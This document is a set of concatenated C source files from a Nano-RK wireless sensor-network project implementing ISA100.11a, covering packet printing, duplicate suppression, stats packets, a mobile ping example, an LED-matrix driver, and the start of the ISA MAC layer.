printf( " last_hop_mac\t\t0x%x\n",ds_pkt->last_hop_mac);
printf( " mac_filter_num\t0x%x\n",ds_pkt->mac_filter_num);
printf( " aes_ctr\t\t0x%x 0x%x 0x%x 0x%x\n",ds_pkt->aes_ctr[3], ds_pkt->aes_ctr[3],
ds_pkt->aes_ctr[2], ds_pkt->aes_ctr[1], ds_pkt->aes_ctr[0]);
printf( "Mac Filter List: " );
for(i=0; i<ds_pkt->mac_filter_num; i++ )
printf( "0x%x ",ds_pkt->buf[DS_PAYLOAD_START+i] );
printf( "\n\n" );
printf( "Payload Data: " );
for(i=0; i<ds_pkt->payload_len; i++ )
printf( "0x%x ",ds_pkt->payload[i] );
printf( "\n\n" );
}
void seq_num_cache_init()
{
int i;
for(i=0; i<SEQ_CACHE_SIZE; i++ ) seq_cache[i].valid=0;
}
// This function returns 1 if the packet is a repeat and should be surpressed.
// It returns 0 if the packet is unique.
int seq_num_cache_check( uint8_t *mac_addr, uint8_t seq_num, uint8_t pkt_type)
{
int i,j;
int match;
/*
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid!=0) printf( "cache %d: mac %02x%02x%02x%02x seq=%d type=%d ttl=%d\n",
i, seq_cache[i].addr[3],seq_cache[i].addr[2],seq_cache[i].addr[1],
seq_cache[i].addr[0],seq_cache[i].seq_num, seq_cache[i].pkt_type, seq_cache[i].valid );
}
*/
// This is to stop caching SAMPL reply packets.
// Reply packets all come from the gateway with the same
// seq number and packet type
if( mac_addr[0]==gw_mac &&
mac_addr[1]==gw_subnet_0 &&
mac_addr[2]==gw_subnet_1 &&
mac_addr[3]==gw_subnet_2 ) return 0;
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid>0)
{
seq_cache[i].valid--;
if( mac_addr[0]==seq_cache[i].addr[0] &&
mac_addr[1]==seq_cache[i].addr[1] &&
mac_addr[2]==seq_cache[i].addr[2] &&
mac_addr[3]==seq_cache[i].addr[3] )
{
seq_cache[i].valid=100;
// This is a repeat packet
if(seq_num==seq_cache[i].seq_num && pkt_type==seq_cache[i].pkt_type)
{
return 1;
}
else
{
seq_cache[i].seq_num=seq_num;
seq_cache[i].pkt_type=pkt_type;
return 0;
}
}
}
}
for(i=0; i<SEQ_CACHE_SIZE; i++ )
{
if(seq_cache[i].valid==0)
{
seq_cache[i].addr[0]=mac_addr[0];
seq_cache[i].addr[1]=mac_addr[1];
seq_cache[i].addr[2]=mac_addr[2];
seq_cache[i].addr[3]=mac_addr[3];
seq_cache[i].seq_num=seq_num;
seq_cache[i].pkt_type=pkt_type;
seq_cache[i].valid=100;
return 0;
}
}
return 0;
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/stats_pkt.c.svn-base
#include <globals.h>
#include <../include/sampl.h>
#include <stats_pkt.h>
#ifdef NANORK
#include <nrk.h>
#include <nrk_error.h>
#include <debug.h>
#else
#define my_mac 0
#define RF_MAX_PAYLOAD_SIZE 128
#endif
#ifdef NANORK
int8_t stats_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt)
{
STATS_PKT_T p;
debug_update();
p.mac_addr=my_mac;
p.mac_addr=my_mac;
p.rx_pkts=debug_stats.rx_pkts;
p.tx_pkts=debug_stats.tx_pkts;
p.tx_retry=debug_stats.tx_retry;
p.sensor_samples=debug_stats.sensor_samples;
p.uptime=debug_stats.uptime.secs;
p.deep_sleep=debug_stats.deep_sleep.secs;
p.idle_time=debug_stats.idle_time.secs;
pkt->payload_len = stats_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t stats_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
STATS_PKT_T p1, p2;
//if(in->next_hop_dst_mac!=my_mac ) nrk_kprintf( PSTR( "aggregating bad packet!\r\n" ));
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
stats_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
// get packet from outgoing list and compare against incomming packet
stats_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr ) dup=1;
}
if(dup==0)
{
// if packet is unique, add to outgoing packet
out->payload_len=stats_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
#endif
void stats_pkt_get( STATS_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*STATS_PKT_SIZE];
p->rx_pkts=((uint16_t)buf[index*STATS_PKT_SIZE+1]<<8)|buf[index*STATS_PKT_SIZE+2];
p->tx_pkts=((uint16_t)buf[index*STATS_PKT_SIZE+3]<<8)|buf[index*STATS_PKT_SIZE+4];
p->tx_retry=((uint16_t)buf[index*STATS_PKT_SIZE+5]<<8)|buf[index*STATS_PKT_SIZE+6];
p->sensor_samples=((uint16_t)buf[index*STATS_PKT_SIZE+7]<<8)|buf[index*STATS_PKT_SIZE+8];
p->uptime=((uint32_t)buf[index*STATS_PKT_SIZE+9]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+10]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+11]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+12]);
p->deep_sleep=((uint32_t)buf[index*STATS_PKT_SIZE+13]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+14]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+15]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+16]);
p->idle_time=((uint32_t)buf[index*STATS_PKT_SIZE+17]<<24)|
((uint32_t)buf[index*STATS_PKT_SIZE+18]<<16)|
((uint32_t)buf[index*STATS_PKT_SIZE+19]<<8)|
((uint32_t)buf[index*STATS_PKT_SIZE+20]);
}
uint8_t stats_pkt_add( STATS_PKT_T *p, uint8_t *buf, uint8_t index )
{
if((index+1)*STATS_PKT_SIZE>MAX_PKT_PAYLOAD ) return (index*STATS_PKT_SIZE);
buf[index*STATS_PKT_SIZE]= p->mac_addr;
buf[index*STATS_PKT_SIZE+1]= (p->rx_pkts>>8)&0xff;
buf[index*STATS_PKT_SIZE+2]= (p->rx_pkts)&0xff;
buf[index*STATS_PKT_SIZE+3]= (p->tx_pkts>>8)&0xff;
buf[index*STATS_PKT_SIZE+4]= (p->tx_pkts)&0xff;
buf[index*STATS_PKT_SIZE+5]= (p->tx_retry>>8)&0xff;
buf[index*STATS_PKT_SIZE+6]= (p->tx_retry)&0xff;
buf[index*STATS_PKT_SIZE+7]= (p->sensor_samples>>8)&0xff;
buf[index*STATS_PKT_SIZE+8]= (p->sensor_samples)&0xff;
buf[index*STATS_PKT_SIZE+9]= (p->uptime>>24)&0xff;
buf[index*STATS_PKT_SIZE+10]= (p->uptime>>16)&0xff;
buf[index*STATS_PKT_SIZE+11]= (p->uptime>>8)&0xff;
buf[index*STATS_PKT_SIZE+12]= (p->uptime)&0xff;
buf[index*STATS_PKT_SIZE+13]= (p->deep_sleep>>24)&0xff;
buf[index*STATS_PKT_SIZE+14]= (p->deep_sleep>>16)&0xff;
buf[index*STATS_PKT_SIZE+15]= (p->deep_sleep>>8)&0xff;
buf[index*STATS_PKT_SIZE+16]= (p->deep_sleep)&0xff;
buf[index*STATS_PKT_SIZE+17]= (p->idle_time>>24)&0xff;
buf[index*STATS_PKT_SIZE+18]= (p->idle_time>>16)&0xff;
buf[index*STATS_PKT_SIZE+19]= (p->idle_time>>8)&0xff;
buf[index*STATS_PKT_SIZE+20]= (p->idle_time)&0xff;
return ((index+1)*STATS_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/mobile-example/mobile-multithread/main.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
*******************************************************************************/
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <bmac.h>
#include <nrk_error.h>
#include <slip.h>
#include "../../include/tree_route.h"
#define MAX_SLIP_BUF 128
#define my_subnet_mac 1
#define my_mac 100
#define TXT_DEBUG
nrk_task_type RX_TASK;
NRK_STK rx_task_stack[NRK_APP_STACKSIZE];
void rx_task (void);
nrk_task_type TX_TASK;
NRK_STK tx_task_stack[NRK_APP_STACKSIZE];
void tx_task (void);
void nrk_create_taskset ();
uint8_t slip_rx_buf[MAX_SLIP_BUF];
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
SAMPL_MOBILE_PKT_T mobile_pkt;
int main ()
{
uint16_t div;
nrk_setup_ports ();
nrk_setup_uart (UART_BAUDRATE_115K2);
nrk_init ();
nrk_led_clr (0);
nrk_led_clr (1);
nrk_led_clr (2);
nrk_led_clr (3);
nrk_time_set (0, 0);
bmac_task_config ();
nrk_create_taskset ();
nrk_start ();
return 0;
}
void rx_task ()
{
uint8_t i, len;
int8_t rssi, val;
uint8_t *local_rx_buf;
nrk_time_t check_period;
printf ("rx_task PID=%d\r\n", nrk_get_pid ());
// init bmac on channel 26
bmac_init (26);
// By default the RX check rate is 100ms
// below shows how to change that
//check_period.secs=0;
//check_period.nano_secs=200*NANOS_PER_MS;
//val=bmac_set_rx_check_rate(check_period);
// The default Clear Channel Assement RSSI threshold is -45
// Setting this value higher means that you will only trigger
// receive with a very strong signal. Setting this lower means
// bmac will try to receive fainter packets. If the value is set
// too high or too low performance will suffer greatly.
// bmac_set_cca_thresh(-45);
if(val==NRK_ERROR) nrk_kprintf( PSTR("ERROR setting bmac rate\r\n" ));
// This sets the next RX buffer.
// This can be called at anytime before releaseing the packet
// if you wish to do a zero-copy buffer switch
bmac_rx_pkt_set_buffer (rx_buf, RF_MAX_PAYLOAD_SIZE);
while (1) {
// Wait until an RX packet is received
val = bmac_wait_until_rx_pkt ();
// Get the RX packet
local_rx_buf = bmac_rx_pkt_get (&len, &rssi);
printf ("Got RX packet len=%d RSSI=%d [", len, rssi);
for (i = 0; i < len; i++) printf ("%d ", rx_buf[i]); printf ("]\r\n");
if((local_rx_buf[PKT_TYPE]|MOBILE_MASK)!=0)
{
if(local_rx_buf[PKT_TYPE]==(PING_PKT|MOBILE_MASK))
{
#ifdef TXT_DEBUG
mobile_pkt.pkt_type=local_rx_buf[PKT_TYPE];
mobile_pkt.subnet_mac=local_rx_buf[MOBILE_SUBNET_MAC];
mobile_pkt.src_mac=local_rx_buf[MOBILE_SRC_MAC];
mobile_pkt.dst_mac=local_rx_buf[MOBILE_DST_MAC];
if(mobile_pkt.dst_mac==my_mac || mobile_pkt.dst_mac==BROADCAST )
{
nrk_led_set(GREEN_LED);
// Packet arrived and is good to go
printf( "src: %d ",mobile_pkt.src_mac);
printf( "rssi: %d ",rssi);
printf( "subnet: %d ",mobile_pkt.subnet_mac);
printf( "type: %d ",mobile_pkt.pkt_type);
nrk_kprintf (PSTR ("["));
for (i = MOBILE_PAYLOAD_START; i < len; i++)
printf ("%d ", rx_buf[i]);
nrk_kprintf (PSTR ("]\r\n"));
}
#endif
}
}
// Release the RX buffer so future packets can arrive
bmac_rx_pkt_release ();
}
}
void tx_task ()
{
uint8_t j, i, val, cnt,error;
int8_t len;
nrk_sig_t tx_done_signal;
nrk_sig_mask_t ret;
nrk_time_t check_period;
SAMPL_DOWNSTREAM_PKT_T ds_pkt;
printf ("tx_task PID=%d\r\n", nrk_get_pid ());
slip_init (stdin, stdout, 0, 0);
nrk_kprintf( PSTR("slip_init()\r\n" ));
// Wait until the tx_task starts up bmac
// This should be called by all tasks using bmac that
// do not call bmac_init()...
while (!bmac_started ())
nrk_wait_until_next_period ();
nrk_kprintf( PSTR("bmac_started()\r\n" ));
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
// Get and register the tx_done_signal if you want to
// do non-blocking transmits
tx_done_signal = bmac_get_tx_done_signal ();
nrk_signal_register (tx_done_signal);
cnt = 0;
// Send initial flood at 100ms checkrate
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
while (1) {
// Build a TX packet by hand...
tx_buf[PKT_TYPE]=PING_PKT | MOBILE_MASK;
tx_buf[CTRL_FLAGS]=0;
tx_buf[MOBILE_SUBNET_MAC]=BROADCAST;
tx_buf[MOBILE_SRC_MAC]=my_mac;
tx_buf[MOBILE_DST_MAC]=BROADCAST;
len=MOBILE_PAYLOAD_START;
nrk_led_set (BLUE_LED);
check_period.secs=0;
check_period.nano_secs=100*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
// For blocking transmits, use the following function call.
// For this there is no need to register
val=bmac_tx_pkt(tx_buf, len);
check_period.secs=0;
check_period.nano_secs=25*NANOS_PER_MS;
val=bmac_set_rx_check_rate(check_period);
#ifdef TXT_DEBUG
nrk_kprintf (PSTR ("\r\nSent packet!\r\n"));
#endif
nrk_led_clr (BLUE_LED);
nrk_led_clr (GREEN_LED);
nrk_wait_until_next_period();
}
}
void nrk_create_taskset ()
{
RX_TASK.task = rx_task;
nrk_task_set_stk( &RX_TASK, rx_task_stack, NRK_APP_STACKSIZE);
RX_TASK.prio = 2;
RX_TASK.FirstActivation = TRUE;
RX_TASK.Type = BASIC_TASK;
RX_TASK.SchType = PREEMPTIVE;
RX_TASK.period.secs = 1;
RX_TASK.period.nano_secs = 0;
RX_TASK.cpu_reserve.secs = 1;
RX_TASK.cpu_reserve.nano_secs = 500 * NANOS_PER_MS;
RX_TASK.offset.secs = 0;
RX_TASK.offset.nano_secs = 0;
nrk_activate_task (&RX_TASK);
TX_TASK.task = tx_task;
nrk_task_set_stk( &TX_TASK, tx_task_stack, NRK_APP_STACKSIZE);
TX_TASK.prio = 2;
TX_TASK.FirstActivation = TRUE;
TX_TASK.Type = BASIC_TASK;
TX_TASK.SchType = PREEMPTIVE;
TX_TASK.period.secs = 5;
TX_TASK.period.nano_secs = 0;
TX_TASK.cpu_reserve.secs = 1;
TX_TASK.cpu_reserve.nano_secs = 500 * NANOS_PER_MS;
TX_TASK.offset.secs = 0;
TX_TASK.offset.nano_secs = 0;
nrk_activate_task (&TX_TASK);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/spi_matrix.c
#include <spi_matrix.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
//#include <error-def.h>
//#include <command-interpreter.h>
MATRIX_TABLE matrixTable[] = {
/*
{1, {{126,0,191}, {0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //1 0
{2, {{116,0,191}, {92,0,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //2 1
{2, {{0,84,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //3 2
{2, {{0,28,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //4 3
{2, {{0,92,191}, {0,116,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //5 4
{2, {{0,126,191}, {0,112,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //6 5
{2, {{0,4,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //7 6
{2, {{0,124,191}, {0,124,127},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //8 7
{2, {{0,28,191}, {0,252,129},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //9 8
{5, {{126,0,254}, {66,0,253},{66,0,251},{82,0,247},{114,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //G 9
{5, {{2,0,254}, {2,0,253},{126,0,251},{2,0,247},{2,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //T 10
{5, {{126,0,254}, {64,0,253},{64,0,251},{64,0,247},{64,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //L 11
{5, {{126,0,254}, {4,0,253},{8,0,251},{16,0,247},{126,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //N 12
{5, {{126,0,254}, {66,0,253},{66,0,251},{66,0,247},{66,0,239},{0,0,0},{0,0,0},{0,0,0}}, 0}, //C 13
*/
{1, {{126,0,253}, {0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //1 0
{2, {{116,0,253}, {92,0,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //2 1
{2, {{0,84,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //3 2
{2, {{0,28,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //4 3
{2, {{0,92,253}, {0,116,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //5 4
{2, {{0,126,253}, {0,112,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //6 5
{2, {{0,4,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //7 6
{2, {{0,124,253}, {0,124,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //8 7
{2, {{0,28,253}, {0,252,254},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0},{0,0,0}}, 0}, //9 8
{5, {{126,0,127}, {66,0,191},{66,0,223},{82,0,239},{114,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //G 9
{5, {{2,0,127}, {2,0,191},{126,0,223},{2,0,239},{2,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //T 10
{5, {{126,0,127}, {64,0,191},{64,0,223},{64,0,239},{64,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //L 11
{5, {{126,0,127}, {4,0,191},{8,0,223},{16,0,239},{126,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //N 12
{5, {{126,0,127}, {66,0,191},{66,0,223},{66,0,239},{66,0,247},{0,0,0},{0,0,0},{0,0,0}}, 0}, //C 13
};
uint8_t charIndex; //used tp store character Index
uint8_t numIndex; // used to store the number Index
nrk_time_t displayStartTime;
bool displayNeeded = false;
uint8_t toggle = 0;
/*
void spiSend(void)
{
MATRIX_CLEAR();
//Send data to the matrix
//FASTSPI_TX_WORD(emberUnsignedCommandArgument(0)); //writes 2 bytes to spi
//FASTSPI_WAIT()
FASTSPI_TX(emberUnsignedCommandArgument(0));
FASTSPI_TX(emberUnsignedCommandArgument(1));
FASTSPI_TX(emberUnsignedCommandArgument(2));
//Make the shift register output the data that we send
MATRIX_DISPLAY();
}
*/
void spiPatternSend(uint8_t p1, uint8_t p2,uint8_t p3){
MATRIX_CLEAR();
//Send data to the matrix
//FASTSPI_TX_WORD(emberUnsignedCommandArgument(0)); //writes 2 bytes to spi
//FASTSPI_WAIT()
FASTSPI_TX(p1);
FASTSPI_TX(p2);
FASTSPI_TX(p3);
//Make the shift register output the data that we send
MATRIX_DISPLAY();
}
void setNewDisplay(uint8_t cIndex, uint8_t nIndex){
//the indexes should be within bounds to avoid accessing weird parts of memory
if(nIndex<9) numIndex = nIndex;
if (cIndex > 8 && cIndex < 14) charIndex = cIndex;
nrk_time_get(&displayStartTime);
displayNeeded = true;
}
void setMatrix(){
nrk_time_t currentTime;
//Do the display thing
if (displayNeeded == true){
putchar('p');
if (toggle <= 2){
spiPatternSend(matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][0],matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][1],matrixTable[charIndex].pattern[matrixTable[charIndex].currentIndex][2]);
toggle++ ;//= !toggle;
matrixTable[charIndex].currentIndex++;
if (matrixTable[charIndex].currentIndex >= matrixTable[charIndex].size) matrixTable[charIndex].currentIndex = 0;
}
else {
spiPatternSend(matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][0],matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][1],matrixTable[numIndex].pattern[matrixTable[numIndex].currentIndex][2]);
toggle = 0;//!toggle;
matrixTable[numIndex].currentIndex++;
if (matrixTable[numIndex].currentIndex >= matrixTable[numIndex].size) matrixTable[numIndex].currentIndex = 0;
}
nrk_time_get(¤tTime);
if (currentTime.secs - displayStartTime.secs > DISPLAY_INTERVAL_SECS){
MATRIX_CLEAR();
displayNeeded = false;
}
putchar('q');
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa_backup/isa.h
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
* <NAME>
* <NAME>
*******************************************************************************/
#ifndef _ISA_H
#define _ISA_H
#include <include.h>
#include <isa_scheduler.h>
#include <basic_rf.h>
#include <nrk.h>
#include <nrk_cfg.h>
/*For isa link define */
#define MAX_ISA_GLOBAL_SLOTS 100
#define ISA_STACK_SIZE 128
#define ISA_TOKEN_TIMEOUT 10000
/* For isa link*/
typedef enum{
DHDR_INDEX=0,
DHR_INDEX=0,
SLOT_INDEX=1,
OFFSET_HIGH=1,
OFFSET_LOW=2,
PKT_DATA_START=2
} isa_pkt_field_t;
uint8_t isa_rx_data_ready;
uint8_t isa_tx_data_ready;
uint8_t DHDR;
uint16_t last_slot;
typedef struct {
int8_t length;
int8_t DHDR;
uint8_t *pPayload;
} ISA_TX_INFO;
ISA_TX_INFO isa_tx_info[ISA_SLOTS_PER_FRAME];
typedef struct {
uint16_t mac_addr;
uint8_t channel;
uint8_t power;
uint16_t tx_guard_time;
uint16_t rx_timeout;
uint8_t mobile_sync_timeout;
} isa_param_t;
isa_param_t isa_param;
typedef enum {
ISA_RECIPIENT,
ISA_REPEATER,
ISA_ROUTER
} isa_node_mode_t;
isa_node_mode_t isa_node_mode;
nrk_task_type isa_task;
/* declare task stack for storing isa tasks */
NRK_STK isa_task_stack[ISA_STACK_SIZE];
/* rx or tx structure */
RF_RX_INFO isa_rfRxInfo;
RF_TX_INFO isa_ack_tx;
uint8_t isa_ack_buf[4];
volatile RF_TX_INFO isa_rfTxInfo;
uint8_t _isa_ready; //flag indicating isa protocol is ready
/********************* config function ***********************************/
void isa_start();
void isa_task_config ();
uint8_t isa_init(isa_node_mode_t mode);
void isa_nw_task();
void isa_set_channel (uint8_t chan);
int8_t isa_ready();
int8_t configDHDR();
/********************* waiting function ***********************************/
int8_t isa_wait_until_rx_pkt ();
int8_t isa_wait_until_rx_or_tx ();
/********************* rx and tx function ***********************************/
int8_t isa_rx_pkt_set_buffer(uint8_t *buf, uint8_t size);
void _isa_rx(uint8_t slot);
int8_t isa_rx_pkt_check();
void isa_rx_pkt_release();
void _isa_tx (uint8_t slot);
int8_t isa_tx_pkt (uint8_t *tx_buf, uint8_t len, uint8_t DHDR, uint8_t slot);
uint8_t* isa_rx_pkt_get (uint8_t *len, int8_t *rssi);
/********************* rtl_scheduler.c ***********************************/
int8_t isa_set_schedule (isa_node_mode_t isa_node_mode);
int8_t isa_get_schedule (uint8_t slot);
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa.c
/******************************************************************************
* Nano-RK, a real-time operating system for sensor networks.
* Copyright (C) 2007, Real-Time and Multimedia Lab, Carnegie Mellon University
* All rights reserved.
*
* This is the Open Source Version of Nano-RK included as part of a Dual
* Licensing Model. If you are unsure which license to use please refer to:
* http://www.nanork.org/nano-RK/wiki/Licensing
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, version 2.0 of the License.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*
* Contributing Authors (specific to this file):
* <NAME>
*******************************************************************************/
//#include <rtl_debug.h>
#include <include.h>
#include <ulib.h>
#include <avr/sleep.h>
#include <avr/wdt.h>
#include <avr/eeprom.h>
#include <stdio.h>
#include <avr/interrupt.h>
#include <nrk.h>
#include <nrk_events.h>
#include <nrk_timer.h>
#include <nrk_error.h>
//#include <rtl_defs.h>
#include <stdlib.h>
//#include <isa_scheduler.h>
#include <isa.h>
#include <isa_defs.h>
#include <isa_error.h>
#include <nrk_cfg.h>
#include <spi_matrix.h>
#define CHANNEL_HOPPING
//#define CORRECTION
//#define INIT_SYNC
#define LED_SLOT_DEBUG
//#define HIGH_TIMER_DEBUG
#define TX_RX_DEBUG
#define ACK_DEBUG
#define RX_DEBUG
#define TX_DEBUG
//#define JOIN_PROCESS
#ifdef JOIN_PROCESS
uint8_t join_pkt_buf[RF_MAX_PAYLOAD_SIZE];
#endif
/* slot related declaration */
volatile uint16_t global_slot;
volatile uint16_t current_global_slot;
volatile uint16_t global_cycle;
uint16_t last_sync_slot;
/* channel hopping related declaration */
uint8_t slottedPattern[16];
uint8_t slowPattern[3];
uint8_t currentChannel;
uint8_t channelIndex =0;;
uint8_t slowIndex;
/*used for calculating offset*/
uint16_t slot_start_time; // holds the time value in terms of HIGH_SPEED_TIMER_TICKS.
// Generally very close t 0 since the timer is restarted just before this is recorded
uint16_t tx_start_time; // actual transmission starting time in terms of HIGH_SPEED_TIMER_TICKS
uint16_t rx_start_time; // actual transmission recieval time in terms of HIGH_SPEED_TIMER_TICKS
uint16_t offsetY; // tx_start_time - slot_start time (Used for time correction)
uint16_t offsetX; // rx_start_time - slot_start_time (Used for time correction)
/* SYNC related declaration */
uint8_t _isa_sync_ok;
uint8_t AFTER_FIRST_SYNC;
uint16_t EXPIRATION = 200;// each slot lasts for 10ms, so 100 slots last for 1s
uint16_t slot_expired;
uint8_t previous_tx_slot;
/* signal related declaration */
int8_t isa_tx_done_signal;
int8_t isa_rx_pkt_signal;
uint8_t adv_buf[RF_MAX_PAYLOAD_SIZE];
/* header type */
//uint8_t DMXHR[4]; //Data link layer media access control extension sub header, mainly used for security control
uint8_t DAUX[29]; //Data link layer auxiliary sub-header, currently used for join process
//uint8_t DROUT[3]; //Routing sub-header, compressed variant
//uint8_t DADDR[5]; //Addressing sub-header
uint8_t DHR; // ACK's data link layer header
/* Test variable */
uint8_t tmp_curSec;
uint8_t tmp_offsetSec;
int16_t tmp_offsetNanoSec;
uint16_t tmp_count=0;
uint16_t DHDRcount = 0;
uint16_t txCount = 0; //Holds the number of packets transmitted successfully
uint16_t rxCount = 0; // Holds the number of packets received successfully
uint16_t packetsLost = 0; //Holds packets lost (receive + ACK )
uint8_t check = 0;
//Control + F Vignesh for all inclusions For advertisements
uint16_t adjacencyMatrix[DLMO_NEIGHBOR_MAX_COUNT];
void config_child_list (uint8_t node_id)
{
child_list |= ((uint32_t) 1) << node_id;
}
/**
* isa_set_channel()
*
* This function set channel and is used for channel hopping.
*
*/
void isa_set_channel (uint8_t chan)
{
isa_param.channel = chan;
rf_set_channel (chan);
}
/*------------------------------------------------- isa_get_channel() -----
| Function isa_get_channel()
|
| Purpose: Returns the current channel that the radio is set to operate
| on. This will return the channel that was last set using isa_set_channel()
|
| Parameters:
| NONE
|
| Returns: uint8_t channel value
*-------------------------------------------------------------------*/
uint8_t isa_get_channel()
{
return isa_param.channel;
}
void isa_set_channel_pattern(uint8_t pattern)
{
switch (pattern)
{
case 1:
slottedPattern[0] = 19;
slottedPattern[1] = 12;
slottedPattern[2] = 20;
slottedPattern[3] = 24;
slottedPattern[4] = 16;
slottedPattern[5] = 23;
slottedPattern[6] = 18;
slottedPattern[7] = 25;
slottedPattern[8] = 14;
slottedPattern[9] = 21;
slottedPattern[10] = 11;
slottedPattern[11] = 15;
slottedPattern[12] = 22;
slottedPattern[13] = 17;
slottedPattern[14] = 13;
slottedPattern[15] = 26;
break;
